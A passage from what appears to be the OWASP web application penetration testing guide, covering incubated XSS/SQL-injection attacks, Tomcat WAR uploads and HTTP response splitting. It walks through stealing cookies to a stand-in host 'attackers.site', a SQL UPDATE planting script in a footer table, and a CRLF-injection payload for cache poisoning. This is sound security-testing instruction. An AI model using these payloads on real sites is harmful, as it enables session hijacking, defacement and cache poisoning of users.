1BO4r2U
1BO4r2U
1BO4r2U
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
149 150<br />
Web Application Penetration Testing<br />
Web Application Penetration Testing<br />
in a web page. For example, if the attacker can post arbitrary<br />
JavaScript in a bulletin board so that it gets executed by users, then<br />
he might take control of their browsers (e.g., XSS-proxy).<br />
• Misconfigured servers allowing installation of Java packages or<br />
similar web site components (i.e. Tomcat, or web hosting consoles<br />
such as Plesk, CPanel, Helm, etc.)<br />
How to Test<br />
Black Box testing<br />
File Upload Example<br />
Verify the content type allowed to upload to the web application and<br />
the resultant URL for the uploaded file. Upload a file that will exploit<br />
a component in the local user workstation when viewed or downloaded<br />
by the user. Send your victim an email or other kind of alert in<br />
order to lead him/her to browse the page. The expected result is the<br />
exploit will be triggered when the user browses the resultant page<br />
or downloads and executes the file from the trusted site.<br />
XSS Example on a Bulletin Board<br />
[1] Introduce JavaScript code as the value for the vulnerable field,<br />
for instance:<br />
document.write(‘’)<br />
[2] Direct users to browse the vulnerable page or wait for the users<br />
to browse it. Have a “listener” at attackers.site host listening<br />
for all incoming connections.<br />
[3] When users browse the vulnerable page, a request containing<br />
their cookie (document.cookie is included as part of the requested<br />
URL) will be sent to the attackers.site host, such as the following:<br />
- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSION-<br />
ID=ROGUEIDVALUE;<br />
%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https:/vulnerable.site/site/;<br />
TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1<br />
[4] Use cookies obtained to impersonate users at the vulnerable site.<br />
SQL Injection Example<br />
Usually, this set of examples leverages XSS attacks by exploiting a<br />
SQL-injection vulnerability. The first thing to test is whether the target<br />
site has a SQL injection vulnerability. This is described in Section<br />
4.2 Testing for SQL Injection. For each SQL-injection vulnerability,<br />
there is an underlying set of constraints describing the kind of queries<br />
that the attacker/pen-tester is allowed to do.<br />
The tester then has to match the XSS attacks he has devised with<br />
the entries that he is allowed to insert.<br />
[1] In a similar fashion as in the previous XSS example, use a web<br />
page field vulnerable to SQL injection issues to change a value in the<br />
database that would be used by the application as input to be shown<br />
at the site without proper filtering (this would be a combination of an<br />
SQL injection and a XSS issue). For instance, let’s suppose there is a<br />
footer table at the database with all footers for the web site pages,<br />
including a notice field with the legal notice that appears at the bottom<br />
of each web page. You could use the following query to inject<br />
JavaScript code to the notice field at the footer table in the database.<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = ‘x’;<br />
UPDATE footer<br />
SET notice = ‘Copyright 1999-2030%20<br />
document.write(\’\’)’<br />
WHERE notice = ‘Copyright 1999-2030’;<br />
[2] Now, each user browsing the site will silently send his cookies<br />
to the attackers.site (steps b.2 to b.4).<br />
Misconfigured Server<br />
Some web servers present an administration interface that may<br />
allow an attacker to upload active components of her choice to<br />
the site. This could be the case with an Apache Tomcat server that<br />
doesn’t enforce strong credentials to access its Web Application<br />
Manager (or if the pen testers have been able to obtain valid credentials<br />
for the administration module by other means).<br />
In this case, a WAR file can be uploaded and a new web application<br />
deployed at the site, which will not only allow the pen tester to<br />
execute code of her choice locally at the server, but also to plant<br />
an application at the trusted site, which the site regular users can<br />
then access (most probably with a higher degree of trust than<br />
when accessing a different site).<br />
As should also be obvious, the ability to change web page contents<br />
at the server, via any vulnerabilities that may be exploitable<br />
at the host which will give the attacker webroot write permissions,<br />
will also be useful towards planting such an incubated attack on<br />
the web server pages (actually, this is a known infection-spread<br />
method for some web server worms).<br />
Gray Box testing<br />
Gray/white testing techniques will be the same as previously discussed.<br />
• Examining input validation is key in mitigating against this<br />
vulnerability. If other systems in the enterprise use the same<br />
persistence layer they may have weak input validation and the<br />
data may be persisited via a “back door”.<br />
• To combat the “back door” issue for client side attacks, output<br />
validation must also be employed so tainted data shall be<br />
encoded prior to displaying to the client, and hence not execute.<br />
• See the Data Validation section of the Code review guide.<br />
Tools<br />
• XSS-proxy - http://sourceforge.net/projects/xss-proxy<br />
• Paros - http://www.parosproxy.org/index.shtml<br />
• Burp Suite - http://portswigger.net/burp/proxy.html<br />
• Metasploit - http://www.metasploit.com/<br />
References<br />
Most of the references from the Cross-site scripting section are valid.<br />
As explained above, incubated attacks are executed when combining<br />
exploits such as XSS or SQL-injection attacks.<br />
Advisories<br />
• CERT(R) Advisory CA-2000-02 Malicious HTML Tags Embedded in<br />
Client Web Requests - http://www.cert.org/advisories/CA-2000-<br />
02.html<br />
• Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site<br />
scripting vulnerability - http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048059.html<br />
Whitepapers<br />
• Web Application Security Consortium “Threat Classification,<br />
Cross-site scripting” - http://www.webappsec.org/projects/threat/<br />
classes/cross-site_scripting.shtml<br />
Testing for HTTP Splitting/Smuggling<br />
(OTG-INPVAL-016)<br />
Summary<br />
This section illustrates examples of attacks that leverage specific<br />
features of the HTTP protocol, either by exploiting weaknesses of<br />
the web application or peculiarities in the way different agents interpret<br />
HTTP messages.<br />
This section will analyze two different attacks that target specific<br />
HTTP headers:<br />
• HTTP splitting<br />
• HTTP smuggling<br />
The first attack exploits a lack of input sanitization which allows an<br />
intruder to insert CR and LF characters into the headers of the application<br />
response and to ‘split’ that answer into two different HTTP<br />
messages. The goal of the attack can vary from a cache poisoning to<br />
cross site scripting.<br />
In the second attack, the attacker exploits the fact that some specially<br />
crafted HTTP messages can be parsed and interpreted in different<br />
ways depending on the agent that receives them. HTTP smuggling<br />
requires some level of knowledge about the different agents that are<br />
handling the HTTP messages (web server, proxy, firewall) and therefore<br />
will be included only in the Gray Box testing section.<br />
How to Test<br />
Black Box testing<br />
HTTP Splitting<br />
Some web applications use part of the user input to generate the<br />
values of some headers of their responses. The most straightforward<br />
example is provided by redirections in which the target URL<br />
depends on some user-submitted value. Let’s say for instance that<br />
the user is asked to choose whether he/she prefers a standard or<br />
advanced web interface. The choice will be passed as a parameter<br />
that will be used in the response header to trigger the redirection to<br />
the corresponding page.<br />
More specifically, if the parameter ‘interface’ has the value ‘ad-<br />
vanced’, the application will answer with the following:<br />
HTTP/1.1 302 Moved Temporarily<br />
Date: Sun, 03 Dec 2005 16:22:19 GMT<br />
Location: http:/victim.com/main.jsp?interface=advanced<br />
<br />
When receiving this message, the browser will bring the user to<br />
the page indicated in the Location header. However, if the application<br />
does not filter the user input, it will be possible to insert in the<br />
‘interface’ parameter the sequence %0d%0a, which represents the<br />
CRLF sequence that is used to separate different lines. At this point,<br />
testers will be able to trigger a response that will be interpreted as<br />
two different responses by anybody who happens to parse it, for instance<br />
a web cache sitting between us and the application. This can<br />
be leveraged by an attacker to poison this web cache so that it will<br />
provide false content in all subsequent requests.<br />
Let’s say that in the previous example the tester passes the following<br />
data as the interface parameter:<br />
advanced%0d%0aContent-Length:%20<br />
0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-<br />
Type:%20text/html%0d%0aContent-Length:%20<br />
35%0d%0a%0d%0aSorry,%20System%20Down<br />
The resulting answer from the vulnerable application will therefore<br />
be the following:<br />
HTTP/1.1 302 Moved Temporarily<br />
Date: Sun, 03 Dec 2005 16:22:19 GMT<br />
Location: http:/victim.com/main.jsp?interface=advanced<br />
Content-Length: 0<br />
HTTP/1.1 200 OK<br />
Content-Type: text/html<br />
Content-Length: 35<br />
Sorry,%20System%20Down<br />
<br />
The web cache will see two different responses, so if the attacker<br />
sends, immediately after the first request, a second one asking for<br />
/index.html, the web cache will match this request with the second<br />
response and cache its content, so that all subsequent requests directed<br />
to victim.com/index.html passing through that web cache will<br />
receive the “system down” message. In this way, an attacker would<br />
be able to effectively deface the site for all users using that web<br />
cache (the whole Internet, if the web cache is a reverse proxy for the<br />
web application).<br />
Alternatively, the attacker could pass to those users a JavaScript<br />
snippet that mounts a cross site scripting attack, e.g., to steal the<br />
cookies. Note that while the vulnerability is in the application, the<br />
target here is its users. Therefore, in order to look for this vulnerabil-